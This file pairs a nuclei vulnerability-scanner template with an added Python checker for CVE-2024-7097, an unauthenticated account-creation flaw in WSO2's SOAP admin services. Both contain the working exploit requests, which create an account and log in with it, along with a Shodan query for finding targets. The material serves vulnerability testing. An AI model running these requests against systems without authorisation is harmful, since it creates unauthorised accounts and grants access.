id: CVE-2024-7097

info:
  name: WSO2 User Registration - Arbitrary Account Creation
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    The UserRegistrationAdminService SOAP admin service in affected WSO2 products allows new user accounts to be created without authentication, regardless of the self-registration configuration.
  impact: |
    Unauthenticated attackers can bypass self-registration restrictions to create arbitrary user accounts and then authenticate with them, potentially gaining unauthorized access to the WSO2 system and its resources.
  remediation: |
    Apply the WSO2 patches listed in security advisory WSO2-2024-3574. As a general hardening measure, the /services/ SOAP admin endpoints should not be reachable from untrusted networks.
  reference:
    - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
  classification:
    epss-score: 0.25144
    epss-percentile: 0.96286
  metadata:
    verified: true
    max-request: 2
    shodan-query: "WSO2 Carbon Server"
  tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev,vuln

variables:
  username: "{{randstr_1}}"
  password: "{{randstr_2}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "urn:addUser"
        Content-Type: text/xml

        {{username}}
        {{password}}

    matchers:
      - type: status
        status:
          - 202
        internal: true

  - raw:
      - |
        POST /services/AuthenticationAdmin HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

        {{username}}
        {{password}}

    matchers:
      - type: word
        words:
          - "loginResponse"
          - "true"
        condition: and
# digest: 490a0046304402203650f1ee6be3261ffdee785e550ba503d19af5a089faee3c94fd6916141e3f7502202d90ddfd50449d19248bd7fe5e2c2976cf0548b8d1e14fb2eb8fcbcfb402f72e:922c64590222798bb761d5b6d8e72950
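The same two-step probe (create a random account via addUser, then prove it exists by logging in through AuthenticationAdmin), written out as a stand-alone Python checker. This is an added example, not part of the nuclei template above and not WSO2 code. The SOAP namespaces, the userName/password fields of the user DTO and the remoteAddress parameter of login are assumed from WSO2's public admin-service WSDLs and should be confirmed against the target's ?wsdl; the sample responses at the bottom are constructed for the offline self-check, not captured traffic.

```python
"""Checker for CVE-2024-7097 (added example; namespaces and DTO fields are assumed)."""
import secrets
import ssl
import string
import sys
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
REG_NS = "http://services.mgt.registration.identity.carbon.wso2.org"  # assumed
REG_DTO_NS = "http://dto.services.mgt.registration.identity.carbon.wso2.org/xsd"  # assumed
AUTH_NS = "http://authentication.services.core.carbon.wso2.org"  # assumed

REGISTER_PATH = ("/services/UserRegistrationAdminService."
                 "UserRegistrationAdminServiceHttpsSoap11Endpoint/")
LOGIN_PATH = "/services/AuthenticationAdmin"


def random_credentials(length=12):
    """Fresh throwaway credentials, like the template's randstr_1/randstr_2."""
    alphabet = string.ascii_letters + string.digits
    return ("".join(secrets.choice(alphabet) for _ in range(length)),
            "".join(secrets.choice(alphabet) for _ in range(length)))


def add_user_envelope(username, password):
    """addUser request; values are XML-escaped so odd input cannot break the envelope."""
    return (
        f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}" xmlns:ser="{REG_NS}" xmlns:xsd="{REG_DTO_NS}">'
        "<soapenv:Header/><soapenv:Body><ser:addUser><ser:user>"
        f"<xsd:userName>{escape(username)}</xsd:userName>"
        f"<xsd:password>{escape(password)}</xsd:password>"
        "</ser:user></ser:addUser></soapenv:Body></soapenv:Envelope>"
    )


def login_envelope(username, password, remote_address="127.0.0.1"):
    """AuthenticationAdmin login request used to prove the account now exists."""
    return (
        f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}" xmlns:aut="{AUTH_NS}">'
        "<soapenv:Header/><soapenv:Body><aut:login>"
        f"<aut:username>{escape(username)}</aut:username>"
        f"<aut:password>{escape(password)}</aut:password>"
        f"<aut:remoteAddress>{escape(remote_address)}</aut:remoteAddress>"
        "</aut:login></soapenv:Body></soapenv:Envelope>"
    )


def _local(tag):
    return tag.rsplit("}", 1)[-1]  # strip the {namespace} prefix ElementTree adds


def login_succeeded(body):
    """True only if a loginResponse element carries a return value of 'true'.
    The template's word matcher ('loginResponse' and 'true') also fires on a
    response that merely mentions both strings; parsing the XML avoids that."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return False
    for el in root.iter():
        if _local(el.tag) == "loginResponse":
            for child in el:
                if _local(child.tag) == "return":
                    return (child.text or "").strip().lower() == "true"
    return False


def soap_post(base_url, path, soap_action, body, timeout=15):
    """POST a SOAP envelope and return (status, response body)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + path, data=body.encode("utf-8"), method="POST",
        headers={"Content-Type": "text/xml", "SOAPAction": soap_action})
    ctx = ssl.create_default_context()
    ctx.check_hostname = False  # self-signed Carbon certificates are common
    ctx.verify_mode = ssl.CERT_NONE
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check(base_url):
    """Create a random account, then log in with it. Intrusive: a successful
    run leaves the account on the target, so the username is returned for cleanup."""
    user, pw = random_credentials()
    status, _ = soap_post(base_url, REGISTER_PATH, '"urn:addUser"', add_user_envelope(user, pw))
    if status != 202:  # mirrors the template's internal status matcher
        return {"vulnerable": False, "stage": "addUser", "status": status}
    status, body = soap_post(base_url, LOGIN_PATH, '""', login_envelope(user, pw))
    ok = login_succeeded(body)
    return {"vulnerable": ok, "stage": "login", "status": status, "username": user if ok else None}


# Constructed sample responses for the offline self-check (not captured traffic).
SAMPLE_OK = (f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"><soapenv:Body>'
             f'<ns:loginResponse xmlns:ns="{AUTH_NS}"><ns:return>true</ns:return>'
             '</ns:loginResponse></soapenv:Body></soapenv:Envelope>')
SAMPLE_DENIED = SAMPLE_OK.replace(">true<", ">false<")
SAMPLE_DECOY = (f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"><soapenv:Body><soapenv:Fault>'
                '<faultstring>loginResponse unavailable; retry=true</faultstring>'
                '</soapenv:Fault></soapenv:Body></soapenv:Envelope>')

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(check(sys.argv[1]))  # usage: python check.py https://host:9443
    else:
        print(login_succeeded(SAMPLE_OK), login_succeeded(SAMPLE_DENIED), login_succeeded(SAMPLE_DECOY))
```

Run with the base URL of the Carbon management port as the only argument. Note that SAMPLE_DECOY contains both strings the template's word matcher looks for yet is rejected here, which is the reason for parsing the response rather than grepping it. Because the probe creates a real account, keep the returned username so it can be removed after testing.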